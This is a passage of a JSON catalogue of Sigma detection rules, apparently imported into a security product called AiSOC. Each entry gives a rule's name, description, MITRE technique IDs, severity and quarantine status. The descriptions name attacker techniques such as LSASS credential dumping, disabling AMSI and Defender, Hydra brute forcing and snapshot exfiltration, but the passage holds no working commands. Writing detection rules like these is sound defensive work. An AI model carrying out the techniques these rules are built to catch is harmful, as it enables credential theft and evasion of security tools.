language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml" } }, { "id": "sigmahq-sigma-a96970af-f126-420d-90e1-d37bf25e50e1", "type": "detection", "name": "Use Short Name Path in Image", "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-short-name-path-in-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a96970af-f126-420d-90e1-d37bf25e50e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml" } }, { "id": "sigmahq-sigma-a9723fcc-881c-424c-8709-fd61442ab3c3", "type": "detection", "name": "Recon Information for Export with PowerShell", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-information-for-export-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9723fcc-881c-424c-8709-fd61442ab3c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" } }, { "id": "sigmahq-sigma-a982fc9c-6333-4ffb-a51d-addb04e8b529", "type": "detection", "name": "Windows Defender Exclusions Added - Registry", "description": "Detects the Setting of Windows Defender Exclusions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusions-added-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" } }, { "id": "sigmahq-sigma-a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "type": "detection", "name": "Potential Attachment Manager Settings Associations Tamper", "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-attachment-manager-settings-associations-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" } }, { "id": "sigmahq-sigma-a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad", "type": "detection", "name": "MMC Loading Script Engines DLLs", "description": "Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt\nto execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1218.014" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc-loading-script-engines-dlls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml" } }, { "id": "sigmahq-sigma-a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "type": "detection", "name": "Suspicious Use of CSharp Interactive Console", "description": "Detects the execution of CSharp interactive console by PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-use-of-csharp-interactive-console.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml" } }, { "id": "sigmahq-sigma-aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "type": "detection", "name": "Potential Download/Upload Activity Using Type Command", "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-download-upload-activity-using-type-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_type_arbitrary_file_download.yml" } }, { "id": "sigmahq-sigma-aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "type": "detection", "name": "Password Dumper Activity on LSASS", "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-dumper-activity-on-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_lsass_dump.yml" } }, { "id": "sigmahq-sigma-aa2efee7-34dd-446e-8a37-40790a66efd7", "type": "detection", "name": "Recon Information for Export with Command Prompt", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-information-for-export-with-command-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa2efee7-34dd-446e-8a37-40790a66efd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_recon.yml" } }, { "id": "sigmahq-sigma-aa35a627-33fb-4d04-a165-d33b4afca3e8", "type": "detection", "name": "Remote LSASS Process Access Through Windows Remote Management", "description": "Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.001", "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/remote-lsass-process-access-through-windows-remote-management.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml" } }, { "id": "sigmahq-sigma-aa37cbb0-da36-42cb-a90f-fdf216fc7467", "type": "detection", "name": "AMSI Disabled via Registry Modification", "description": "Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.\nAnti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.\nAdversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/amsi-disabled-via-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa37cbb0-da36-42cb-a90f-fdf216fc7467", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_amsi_disable.yml" } }, { "id": "sigmahq-sigma-aa3a6f94-890e-4e22-b634-ffdfd54792cc", "type": "detection", "name": "Suspicious Binary In User Directory Spawned From Office Application", "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-binary-in-user-directory-spawned-from-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" } }, { "id": "sigmahq-sigma-aa6f6ea6-0676-40dd-b510-6e46f02d8867", "type": "detection", "name": "Local File Read Using Curl.EXE", "description": "Detects execution of \"curl.exe\" with the \"file://\" protocol handler in order to read local files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-file-read-using-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa6f6ea6-0676-40dd-b510-6e46f02d8867", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml" } }, { "id": "sigmahq-sigma-aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "type": "detection", "name": "Certificate Exported Via PowerShell - ScriptBlock", "description": "Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-via-powershell-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml" } }, { "id": "sigmahq-sigma-aa8e035d-7be4-48d3-a944-102aec04400d", "type": "detection", "name": "Suspicious Extrac32 Execution", "description": "Download or Copy file with Extrac32", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-extrac32-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa8e035d-7be4-48d3-a944-102aec04400d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" } }, { "id": "sigmahq-sigma-aaafa146-074c-11eb-adc1-0242ac120002", "type": "detection", "name": "HackTool - Hydra Password Bruteforce Execution", "description": "Detects command line parameters used by Hydra password guessing hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-hydra-password-bruteforce-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aaafa146-074c-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_hydra.yml" } }, { "id": "sigmahq-sigma-aac2fd97-bcba-491b-ad66-a6edf89c71bf", "type": "detection", "name": "Executable from Webdav", "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/executable-from-webdav.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_http_executable_download_from_webdav.yml" } }, { "id": "sigmahq-sigma-aac6c4f4-87c7-4961-96ac-c3fd3a42c310", "type": "detection", "name": "Bitbucket Global Permission Changed", "description": "Detects global permissions change activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-global-permission-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aac6c4f4-87c7-4961-96ac-c3fd3a42c310", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml" } }, { "id": "sigmahq-sigma-aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "type": "detection", "name": "Suspicious Use of PsLogList", "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1087.001", "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-use-of-psloglist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml" } }, { "id": "sigmahq-sigma-aaf46cdc-934e-4284-b329-34aa701e3771", "type": "detection", "name": "Uncommon Child Process Of BgInfo.EXE", "description": "Detects uncommon child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-bginfo-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aaf46cdc-934e-4284-b329-34aa701e3771", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-ab37a6ec-6068-432b-a64e-2c7bf95b1d22", "type": "detection", "name": "Scripting/CommandLine Process Spawned Regsvr32", "description": "Detects various command line and scripting engines/processes such as \"PowerShell\", \"Wscript\", \"Cmd\", etc. spawning a \"regsvr32\" instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scripting-commandline-process-spawned-regsvr32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab37a6ec-6068-432b-a64e-2c7bf95b1d22", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml" } }, { "id": "sigmahq-sigma-ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1", "type": "detection", "name": "Important Windows Event Auditing Disabled", "description": "Detects scenarios where system auditing for important events such as \"Process Creation\" or \"Logon\" events is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-event-auditing-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml" } }, { "id": "sigmahq-sigma-ab567429-1dfb-4674-b6d2-979fd2f9d125", "type": "detection", "name": "Internet Explorer DisableFirstRunCustomize Enabled", "description": "Detects changes to the Internet Explorer \"DisableFirstRunCustomize\" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/internet-explorer-disablefirstruncustomize-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab567429-1dfb-4674-b6d2-979fd2f9d125", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml" } }, { "id": "sigmahq-sigma-ab6bffca-beff-4baa-af11-6733f296d57a", "type": "detection", "name": "Potential AD User Enumeration From Non-Machine Account", "description": "Detects read access to a domain user from a non-machine account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ad-user-enumeration-from-non-machine-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab6bffca-beff-4baa-af11-6733f296d57a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_ad_user_enumeration.yml" } }, { "id": "sigmahq-sigma-ab70c354-d9ac-4e11-bbb6-ec8e3b153357", "type": "detection", "name": "Remote Access Tool - Team Viewer Session Started On Windows Host", "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-team-viewer-session-started-on-windows-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab70c354-d9ac-4e11-bbb6-ec8e3b153357", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml" } }, { "id": "sigmahq-sigma-ab871450-37dc-4a3a-997f-6662aa8ae0f1", "type": "detection", "name": "Disable Macro Runtime Scan Scope", "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-macro-runtime-scan-scope.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" } }, { "id": "sigmahq-sigma-ab90dab8-c7da-4010-9193-563528cfa347", "type": "detection", "name": "Potentially Suspicious Self Extraction Directive File Created", "description": "Detects the creation of a binary file with the \".sed\" extension. The \".sed\" extension stand for Self Extraction Directive files.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\nUsually \".sed\" files are simple ini files and not PE binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-self-extraction-directive-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab90dab8-c7da-4010-9193-563528cfa347", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml" } }, { "id": "sigmahq-sigma-ab9e3b40-0c85-4ba1-aede-455d226fd124", "type": "detection", "name": "Suspicious Redirection to Local Admin Share", "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-redirection-to-local-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab9e3b40-0c85-4ba1-aede-455d226fd124", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml" } }, { "id": "sigmahq-sigma-aba15bdd-657f-422a-bab3-ac2d2a0d6f1c", "type": "detection", "name": "Potentially Suspicious DMP/HDMP File Creation", "description": "Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-dmp-hdmp-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aba15bdd-657f-422a-bab3-ac2d2a0d6f1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml" } }, { "id": "sigmahq-sigma-abae8fec-57bd-4f87-aff6-6e3db989843d", "type": "detection", "name": "AWS Snapshot Backup Exfiltration", "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-snapshot-backup-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "abae8fec-57bd-4f87-aff6-6e3db989843d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml" } }, { 